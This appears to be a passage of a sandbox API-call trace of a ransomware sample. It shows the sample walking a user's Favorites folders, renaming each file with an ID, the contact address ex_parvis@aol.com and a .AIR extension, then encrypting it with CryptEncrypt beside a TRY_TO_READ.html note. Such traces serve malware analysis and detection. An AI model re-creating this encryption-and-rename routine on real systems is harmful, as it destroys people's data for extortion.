	[0106.359] FindNextFileW (in: hFindFile=0x5daef0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe64f9f10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe64f9f10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.359] FindNextFileW (in: hFindFile=0x5daef0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1
	[0106.359] FindNextFileW (in: hFindFile=0x5daef0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0
	[0106.359] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.360] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.360] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x80) returned 1
	[0106.360] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 68
	[0106.360] GetProcessHeap () returned 0x540000
	[0106.360] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xee) returned 0x598b60
	[0106.360] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url"
	[0106.360] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.360] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.395] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c
	[0106.395] GetProcessHeap () returned 0x540000
	[0106.395] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.395] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=226) returned 1
	[0106.395] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xe2
	[0106.395] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.395] GetProcessHeap () returned 0x540000
	[0106.395] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.395] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.396] WriteFile (in: hFile=0x52c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.398] WriteFile (in: hFile=0x52c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.398] WriteFile (in: hFile=0x52c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.398] ReadFile (in: hFile=0x52c, lpBuffer=0x598b60, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598b60*, lpNumberOfBytesRead=0x3a1f778*=0xe2, lpOverlapped=0x0) returned 1
	[0106.398] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.398] WriteFile (in: hFile=0x52c, lpBuffer=0x57fb28*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesWritten=0x3a1f778*=0xe2, lpOverlapped=0x0) returned 1
	[0106.398] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.398] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.398] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", dwFileAttributes=0x80) returned 1
	[0106.399] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 66
	[0106.399] GetProcessHeap () returned 0x540000
	[0106.399] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x598b60
	[0106.399] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url"
	[0106.399] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.399] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.402] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c
	[0106.402] GetProcessHeap () returned 0x540000
	[0106.402] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.402] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=236) returned 1
	[0106.402] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xec
	[0106.402] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.402] GetProcessHeap () returned 0x540000
	[0106.402] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.402] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.402] WriteFile (in: hFile=0x52c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.406] WriteFile (in: hFile=0x52c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.406] WriteFile (in: hFile=0x52c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.406] ReadFile (in: hFile=0x52c, lpBuffer=0x598b60, nNumberOfBytesToRead=0xec, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598b60*, lpNumberOfBytesRead=0x3a1f778*=0xec, lpOverlapped=0x0) returned 1
	[0106.406] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-236, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.406] WriteFile (in: hFile=0x52c, lpBuffer=0x57fb28*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesWritten=0x3a1f778*=0xec, lpOverlapped=0x0) returned 1
	[0106.406] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.406] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.406] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0106.407] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 58
	[0106.407] GetProcessHeap () returned 0x540000
	[0106.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x601bd0
	[0106.407] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini"
	[0106.407] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.407] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.409] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c
	[0106.409] GetProcessHeap () returned 0x540000
	[0106.409] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0106.409] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=80) returned 1
	[0106.409] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x50
	[0106.409] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.409] GetProcessHeap () returned 0x540000
	[0106.409] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.409] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.410] WriteFile (in: hFile=0x52c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.411] WriteFile (in: hFile=0x52c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.411] WriteFile (in: hFile=0x52c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.412] ReadFile (in: hFile=0x52c, lpBuffer=0x58b9f0, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x58b9f0*, lpNumberOfBytesRead=0x3a1f778*=0x50, lpOverlapped=0x0) returned 1
	[0106.412] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-80, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.412] WriteFile (in: hFile=0x52c, lpBuffer=0x58b940*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x58b940*, lpNumberOfBytesWritten=0x3a1f778*=0x50, lpOverlapped=0x0) returned 1
	[0106.412] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5daf30
	[0106.412] FindNextFileW (in: hFindFile=0x5daf30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.412] FindNextFileW (in: hFindFile=0x5daf30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1
	[0106.412] FindNextFileW (in: hFindFile=0x5daf30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1
	[0106.412] FindNextFileW (in: hFindFile=0x5daf30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1
	[0106.412] FindNextFileW (in: hFindFile=0x5daf30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1
	[0106.413] FindNextFileW (in: hFindFile=0x5daf30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1
	[0106.413] FindNextFileW (in: hFindFile=0x5daf30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6520070, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.413] FindNextFileW (in: hFindFile=0x5daf30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6520070, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0106.413] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.413] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.413] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x80) returned 1
	[0106.414] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 79
	[0106.414] GetProcessHeap () returned 0x540000
	[0106.414] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x104) returned 0x598b60
	[0106.414] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url"
	[0106.414] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.414] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.416] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x530
	[0106.416] GetProcessHeap () returned 0x540000
	[0106.416] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.416] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=134) returned 1
	[0106.416] SetFilePointer (in: hFile=0x530, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x86
	[0106.416] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.416] GetProcessHeap () returned 0x540000
	[0106.416] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.416] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.416] WriteFile (in: hFile=0x530, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
